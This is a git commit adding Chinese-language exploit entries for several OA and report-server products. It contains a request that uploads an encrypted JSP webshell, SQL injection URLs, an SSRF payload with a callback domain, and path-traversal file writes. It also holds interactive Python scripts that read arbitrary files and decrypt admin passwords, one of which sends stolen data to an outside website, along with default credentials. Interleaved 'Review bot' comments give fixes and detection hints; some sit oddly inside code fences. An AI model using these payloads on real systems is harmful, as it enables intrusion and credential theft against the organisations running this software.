OA product vulnerabilities

This commit is contained in:
Threekiii 2022-02-21 09:35:01 +08:00
parent e9e1a4597a
commit 8b4e8ec87c
45 changed files with 4527 additions and 0 deletions

@ -0,0 +1,50 @@
# 万户OA fileUpload.controller 任意文件上传漏洞
## 漏洞描述
万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件
## 漏洞影响
```
万户OA
```
## FOFA
```
app="万户网络-ezOFFICE"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628348571931-52bde954-fcd0-485f-bc17-1494f5eb53f4.png)
发送请求包上传文件
```php
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*......tas9er*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628348700247-9ac78c6c-b56f-4137-a0b3-ba3b13733c19.png)
使用冰蝎连接木马 **/defaultroot/upload/html/xxxxxxxxxx.jsp**
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628349045223-89889c4f-c7e6-4a31-af77-5c58fa8749b4.png)
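Review bot: the reproduction request from `Content-Disposition: form-data; name="file"; filename="cmd.jsp"` onward embeds a complete AES-keyed JSP class loader (the 冰蝎 shell named in the last step) where an inert marker file would prove the same upload flaw; a reference entry should carry the harmless variant and mention the shell only in prose. The 漏洞影响 block names the product with no affected build range, fixed version or vendor advisory, so a defender cannot tell whether a given deployment is exposed. Two smaller points: the `Host:` header is empty and the fence is tagged `php` for what is an HTTP request. For operators, the text states the upload lands under `/defaultroot/upload/html/` as a `.jsp`, so unauthenticated POSTs to `/defaultroot/upload/fileUpload.controller` with a `.jsp` filename, or new `.jsp` files appearing in that directory, are the events to alert on.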

@ -0,0 +1,46 @@
# 华天动力OA 8000版 workFlowService SQL注入漏洞
## 漏洞描述
华天动力OA 8000版 workFlowService接口存在SQL注入漏洞攻击者通过漏洞可获取数据库敏感信息
## 漏洞影响
```
华天动力OA 8000版
```
## FOFA
```
app="华天动力-OA8000"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496676017-abce1043-e1a9-4142-9481-555f1bf0821c.png)
发送请求包验证漏洞
```php
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 、
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628496737082-cede14dc-71ae-4ec3-83da-e0707e4f8f4f.png)
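Review bot: the body `<string>select user()</string>` is a complete SQL statement handed to `getDataListForTree`, which means the buffalo RPC method executes caller-supplied SQL rather than failing to escape one value; 漏洞描述 should say so, because the remediation differs (removing or authenticating the RPC method, not parameterizing a single query). The captured request has a stray full-width punctuation mark in `Host: 、`, the fence is tagged `php` for an HTTP request, and 漏洞影响 gives no fixed version. For detection, POSTs to `/OAapp/bfapp/buffalo/workFlowService` whose `<buffalo-call>` body contains SQL keywords, sent without a session, are a precise indicator.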

@ -0,0 +1,33 @@
# 启莱OA CloseMsg.aspx SQL注入漏洞
## 漏洞描述
启莱OA CloseMsg.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
存在SQL注入的文件为 CloseMsg.aspx
```plain
http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-3-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-1.png)
使用SQLmap对参数 user 进行注入
![qilai-3-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-3-2.png)
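Review bot: `登录页面如下` at the top of 漏洞复现 announces a screenshot that is not there; the sibling messageurl.aspx and treelist.aspx entries each have a login-page image, so this one was dropped. The payload `user=' and (select db_name())>0--` tells the reader that the backend is SQL Server and that the injection point is the pre-authentication `user` login field, but neither fact appears in the prose; both belong in 漏洞描述 together with the fix (a parameterized query in the login handler) and the patched version. `(select db_name())>0--` in a query string to `/client/*.aspx` is the string to hunt for in web logs.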

@ -0,0 +1,35 @@
# 启莱OA messageurl.aspx SQL注入漏洞
## 漏洞描述
启莱OA messageurl.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-2-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-1.png)
存在SQL注入的文件为 messageurl.aspx
```plain
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-2-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-2.png)
使用SQLmap对参数 user 进行注入
![qilai-2-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-2-3.png)
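Review bot: this entry, CloseMsg.aspx and treelist.aspx differ only in the page name and use the identical `user=' and (select db_name())>0--&pwd=1` payload, so they describe one flaw in shared login handling rather than three vulnerabilities; a single entry listing the three affected pages would be clearer and would make the point that patching one page does not close the others. `使用SQLmap对参数 user 进行注入` is the only statement about the parameter and it describes exploitation; 漏洞描述 should name the root cause (the unparameterized `user` value) and the fix.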

@ -0,0 +1,38 @@
# 启莱OA treelist.aspx SQL注入漏洞
## 漏洞描述
启莱OA treelist.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## FOFA
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-1-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-1.png)
存在SQL注入的文件为 treelist.aspx
```plain
http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-1-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-2.png)
使用SQLmap对参数 user 进行注入
![qilai-1-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/qilai-1-3.png)
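Review bot: the 漏洞影响 block for all three 启莱OA entries is just the product name; a defender needs the affected release or build range and the version that fixed it, and `db_name()` in the payload implies SQL Server, which should be stated as the DBMS this entry applies to. The 漏洞复现 steps also end at `使用SQLmap对参数 user 进行注入` without saying what a vulnerable response looks like versus the patched behaviour, so a reader re-testing after a patch has no pass/fail criterion.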

@ -0,0 +1,28 @@
# 帆软报表 2012 SSRF漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取造成SSRF
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
漏洞验证Url为
```plain
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```
![image-20220209113126929](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091131035.png)
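Review bot: the title says SSRF but 漏洞描述 reads `存在信息泄露漏洞通过访问特定的Url获取造成SSRF`, naming a different class; the description should say that `op=resource&resource=` makes the server fetch an attacker-supplied host and that the out-of-band request itself is the impact. `0m0m6k.dnslog.cn` is a specific callback domain and should be a placeholder in a reference entry. No affected build or fix version is given beyond `帆软报表 2012`. For monitoring, a `resource=` parameter carrying an external hostname, and the report server making outbound DNS or HTTP requests to hosts it has no business contacting, are the signals.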

@ -0,0 +1,47 @@
# 帆软报表 2012 信息泄露漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取部分敏感信息
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
获取登录报表系统的IP
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```
![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png)
数据库信息泄露
```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```
![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png)
后台默认口令 admin/123456
```plain
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
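Review bot: `后台默认口令 admin/123456` followed by the `op=fr_auth&cmd=ah_login` URL is a separate weakness (default credentials) folded into an information-disclosure entry; it deserves its own heading or entry so that version tracking and remediation are not conflated. `sc_getconnectioninfo` returning database connection details means the fix is to restrict `op=fr_server` commands to authenticated administrators, which the entry should state. Requests for `op=fr_server&cmd=sc_getconnectioninfo` or `cmd=sc_visitstatehtml` from outside the administrative network are straightforward detection rules.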
```

@ -0,0 +1,255 @@
# 帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757
## 漏洞描述
FineReport报表软件是一款纯Java编写的集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。
FineReport v8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。
## 漏洞影响
```
FineReport < v8.0
```
## FOFA
```
body="isSupportForgetPwd"
```
## 漏洞复现
出现漏洞的文件为 fr-applet-8.0.jar
```java
package com.fr.chart.web;
import com.fr.base.FRContext;
import com.fr.general.IOUtils;
import com.fr.stable.CodeUtils;
import com.fr.web.core.ActionNoSessionCMD;
import com.fr.web.utils.WebUtils;
import java.io.InputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class ChartGetFileContentAction extends ActionNoSessionCMD {
public ChartGetFileContentAction() {
}
public void actionCMD(HttpServletRequest var1, HttpServletResponse var2, String var3) throws Exception {
String var4 = CodeUtils.cjkDecode(WebUtils.getHTTPRequestParameter(var1, "resourcepath"));
if (!WebUtils.invalidResourcePath(var4)) {
InputStream var5 = FRContext.getCurrentEnv().readResource(var4);
String var6 = IOUtils.inputStream2String(var5);
var6 = var6.replace('\ufeff', ' ');
WebUtils.printAsString(var2, var6);
}
}
public String getCMD() {
return "get_geo_json";
}
}
```
使用request将文件名传入 调用cjkDecode函数解密文件名
使用invalidResourcePath函数校验文件是否存在
最后使用readResource函数读取文件传输到浏览器上 默认目录为resources
其中的privilege.xml里面存储了后台的用户名密码
```xml
<?xml version="1.0" encoding="UTF-8"?>
<PrivilegeManager xmlVersion="20170715" releaseVersion="8.0.0" fsSystemManagerPassSet="true" birthday="0" male="false">
<rootManagerName>
<![CDATA[admin]]></rootManagerName>
<rootManagerPassword>
<![CDATA[___00520017004e002b004100b7004200250023007f003d003d005400e4001c0057]]></rootManagerPassword>
<AP class="com.fr.privilege.providers.NoAuthenticationProvider"/>
<ForwardUrl>
<![CDATA[${servletURL}?op=fr_platform]]></ForwardUrl>
<PVFILTER class="com.fr.fs.privilege.auth.BasePrivilegeFilter"/>
</PrivilegeManager>
```
- 加密函数
```java
public static String passwordEncode(String var0) {
StringBuilder var1 = new StringBuilder();
var1.append("___");
if (var0 == null) {
return var1.toString();
} else {
int var2 = 0;
for(int var3 = 0; var3 < var0.length(); ++var3) {
if (var2 == PASSWORD_MASK_ARRAY.length) {
var2 = 0;
}
int var4 = var0.charAt(var3) ^ PASSWORD_MASK_ARRAY[var2];
String var5 = Integer.toHexString(var4);
int var6 = var5.length();
for(int var7 = 0; var7 < 4 - var6; ++var7) {
var5 = "0" + var5;
}
var1.append(var5);
++var2;
}
return var1.toString();
}
}
```
- 解密函数
```java
public static String passwordDecode(String var0) {
if (var0 != null && var0.startsWith("___")) {
var0 = var0.substring(3);
StringBuilder var1 = new StringBuilder();
int var2 = 0;
for(int var3 = 0; var3 <= var0.length() - 4; var3 += 4) {
if (var2 == PASSWORD_MASK_ARRAY.length) {
var2 = 0;
}
String var4 = var0.substring(var3, var3 + 4);
int var5 = Integer.parseInt(var4, 16) ^ PASSWORD_MASK_ARRAY[var2];
var1.append((char)var5);
++var2;
}
var0 = var1.toString();
}
return var0;
}
```
使用python写出的解密代码为
```python
cipher = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
```
这里使用上面讲述的原理进行复现,访问目标
![image-20220209112534997](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127442.png)
路径分为两种
- /WebReport/ReportServer
- ReportServer
访问POC为,读取密码文件 privilege.xml
```plain
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
```
![image-20220209112600321](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127198.png)
使用解密脚本解密文件
![image-20220209112628783](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127350.png)
得到密码,即可登陆后台系统,账户为 admin
![image-20220209112641890](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127170.png)
## 漏洞POC
```python
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 帆软报表 v8.0 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def decode_passwd(cipher):
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] # 掩码
Password = ""
cipher = cipher[3:] # 截断三位后
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
return Password
def POC_1(target_url):
vuln_url_1 = target_url + '/WebReport/ReportServer'
vuln_url_2 = target_url + '/ReportServer'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response_1 = requests.get(url=vuln_url_1, timeout=5, verify=False, headers=headers)
response_2 = requests.get(url=vuln_url_2, timeout=5, verify=False, headers=headers)
if "部署页面" in response_1.text:
print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_1))
POC_2(vuln_url_1)
elif "部署页面" in response_2.text:
print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_2))
POC_2(vuln_url_2)
else:
print("\033[31m[x] 目标漏洞无法利用 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 目标漏洞无法利用 {} \033[0m".format(e))
sys.exit(0)
def POC_2(vuln_url_fileread):
vuln_url = vuln_url_fileread + "?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, verify=False, timeout=5)
print("\033[32m[o] 正在访问: {} \033[0m".format(vuln_url))
if "rootManagerPassword" in response.text and response.status_code == 200:
print("\033[32m[o] 目标存在漏洞,读取敏感文件 \n{} \033[0m".format(response.text))
user_name = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerName>', response.text)
cipher = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerPassword>', response.text)
password = decode_passwd(cipher[0])
print("\033[34m[o] 后台账户密码为:{} {} \033[0m".format(user_name[0], password))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![image-20220209112755243](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091127341.png)
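Review bot: `FineReport < v8.0` in 漏洞影响 contradicts `FineReport v8.0版本存在任意文件读取漏洞` in 漏洞描述 and the `fr-applet-8.0.jar` named as the vulnerable artifact; the range should include 8.0 and name the fixed build. `使用invalidResourcePath函数校验文件是否存在` describes `WebUtils.invalidResourcePath` as an existence check, but the name denotes a path-validity filter; the entry should state what the filter rejects, since that is what explains why `resourcepath=privilege.xml` passes. Worth making explicit for readers: `passwordEncode` is a fixed eight-value XOR mask (`PASSWORD_MASK_ARRAY`) with four-digit hex output, i.e. reversible obfuscation, so disclosure of `privilege.xml` is equivalent to plaintext credential disclosure and the stored password should be treated as compromised once the file has been read. Detection: GETs to `ReportServer` with `op=chart&cmd=get_geo_json&resourcepath=` naming `.xml` files.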

@ -0,0 +1,33 @@
# 帆软报表 V9 任意文件覆盖文件上传
## 漏洞描述
帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
## 漏洞影响
```
帆软 V9
```
## 漏洞复现
![314e84b5-e2ac-4e12-9942-653a8b2445a4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091128879.png)
```plain
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 192.168.10.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8
Content-Length: 74
{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
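Review bot: `filePath=chartmapsvg/../../../../WebReport/update.jsp` shows the root cause is missing canonicalization of `filePath` in `design_save_svg`; the entry should state that the fix is to normalize the path and reject any result outside the svg directory, and should say whether the call needs a session (the request carries two `JSESSIONID` cookies, which suggests it does). Those cookie values look real and should be placeholders, and `Content-Type:text/xml;charset=UTF-8` does not match the JSON body. This entry also lacks the FOFA and 漏洞描述 detail present in the other 帆软 entries. For detection, `..` sequences in `filePath` on `op=svginit` requests, and new `.jsp` files under `/WebReport/`, are the indicators.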
```

@ -0,0 +1,31 @@
# 新点OA ExcelExport 敏感信息泄露漏洞
## 漏洞描述
新点OA 存在敏感信息泄露漏洞访问特定的Url时可以获取所有用户的登录名信息攻击者获取后可以进一步利用
## 漏洞影响
```
新点OA
```
## FOFA
```
app="新点OA"
```
## 漏洞复现
构造的Url为
```plain
/ExcelExport/人员列表.xls
```
将会下载人员列表文件
![xindian](https://typora-1308934770.cos.ap-beijing.myqcloud.com/xindian.png)
通过获取的登录名登陆后台(默认密码11111)
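Review bot: `通过获取的登录名登陆后台(默认密码11111)` describes a second weakness, default passwords, that turns a username disclosure into account access; it should be called out separately in 漏洞描述 with its own remediation (forced password change on first login). The path `/ExcelExport/人员列表.xls` is shown with an unencoded non-ASCII filename; the entry should also give the percent-encoded form as it appears in requests and access logs. No affected or fixed version is given. The fix is authentication on the export directory; unauthenticated GETs under `/ExcelExport/` that return `.xls` content are the detection signal.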

@ -0,0 +1,74 @@
# 泛微OA DBconfigReader.jsp 数据库配置信息泄漏漏洞
## 漏洞描述
2019年10月24日360CERT监测到友商发布了泛微e-cology OA数据库配置信息泄漏漏洞预警漏洞等级中。
攻击者可通过存在漏洞的页面直接获取到数据库配置信息。如果攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。
360CERT判断漏洞等级为中危害面/影响面低。建议使用泛微e-cology OA的用户及时安装最新补丁以免遭受黑客攻击。
## 影响版本
```
目前已知为8.100.0531,不排除其他版本包括不限于EC7.0、EC8.0、EC9.0版
```
## 漏洞复现
根据源码可以得到DES密钥为 1z2x3c4v5b6n也有1z2x3c4v的,可以按此规律来爆破)
![image-20220209103714654](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091037951.png)
可以看到会将当前连接数据库的用户名密码urllogintype等信息进行des加密并最终进行返回可以直接通过des解密获取泄露信息。
## 漏洞POC
[Github链接](https://github.com/ianxtianxt/ecologyExp.jar)
python代码
```python
import base64
import requests
import ast
def req(url):
headers = {
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
r1 = requests.get(url,headers=headers).content
s = r1.replace('\r\n','')
res1 = base64.b64encode(s)
postdata = {
'data':res1,
'type':'des',
'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
}
u = 'http://tool.chacuo.net/cryptdes'
r2 = requests.post(u,data=postdata,headers=headers).content
res2 = ast.literal_eval(r2)
return res2['data']
url = 'http://xxx.xxx.xxx.xxx:8888//mobile/DBconfigReader.jsp'
print req(url)
```
## 参考文章
[[更新\]泛微e-cology OA数据库配置信息泄漏漏洞预警](https://mp.weixin.qq.com/s/zTEUan_BtDDzuHzmd9pxYg)
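Review bot: `u = 'http://tool.chacuo.net/cryptdes'` sends the ciphertext fetched from the target to a third-party web service for decryption, so anyone running this script in an authorized assessment hands the client's database credentials to an external site; the entry should flag this and the decryption should happen locally. The text gives the key as `1z2x3c4v5b6n` while the script passes `p=1z2x3c4v`, with only a parenthetical saying both occur; the entry should say which versions use which. The script is Python 2 (`print req(url)`, `.replace` on the response body) while the rest of the collection is Python 3, and the target URL has a doubled slash in `:8888//mobile/`. 影响版本 says `目前已知为8.100.0531` but does not name the patch. For detection, GETs to `/mobile/DBconfigReader.jsp` that return a body are sufficient.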

@ -0,0 +1,182 @@
# 泛微OA E-Bridge saveYZJFile 任意文件读取漏洞
## 漏洞描述
泛微云桥e-Bridge是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
## 影响版本
```
泛微云桥 e-Bridge 2018-2019 多个版本
```
## FOFA
```
title="泛微云桥e-Bridge"
```
## 漏洞复现
分为两种,分别为 Windows 和 Linux
### Windows
访问 [**http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt**](http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt)
![image-20220209104944042](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091049126.png)
成功返回 **id值**,说明含有此漏洞
调用查看文件接口访问 **http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值**
![image-20220209104956250](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091049307.png)
### Linux
访问 [**http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt**](http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt)
![image-20220209105016727](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050824.png)
成功返回 **id值**,说明含有此漏洞
调用查看文件接口访问 **http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值**
![image-20220209105027907](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050974.png)
## 漏洞POC
注意读取Linux系统文件时需要完整路径
例如读取根目录下的 1.txt
应为 /1.txt 而不是 1.txt
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 泛微云桥 e-Bridge \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
# 判断操作系统 or 判断漏洞是否可利用
def POC_1(target_url):
vuln_url_1 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt"
vuln_url_2 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
vuln_url_3 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)
response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)
response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)
if "无法验证您的身份" in response_1.text and "无法验证您的身份" in response_2.text:
print("\033[31m[x] 漏洞已修复,不存在漏洞 \033[0m")
sys.exit(0)
else:
if "No such file or directory" in response_1.text:
print("\033[32m[o] 目标为 Linux 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_3.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
return id,"linux"
elif "系统找不到指定的路径" in response_2.text:
print("\033[32m[o] 目标为 Windows 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_1.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
return id,"windows"
else:
print("\033[31m[x] 无法获取目标系统\033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
# 验证漏洞
def POC_2(target_url, id):
file_url = target_url + "/file/fileNoLogin/{}".format(id)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
response.encoding = 'GBK'
print("\033[32m[o] 成功读取:\n\033[0m{}".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
# windows 文件读取
def POC_3(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
POC_2(target_url, id)
except :
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")
# linux读取文件
def POC_4(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id{}\033[0m".format(id))
POC_2(target_url, id)
except:
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
id,system = POC_1(target_url)
POC_2(target_url, id)
while True:
if system == "windows":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_3(target_url, File)
if system == "linux":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_4(target_url, File)
```
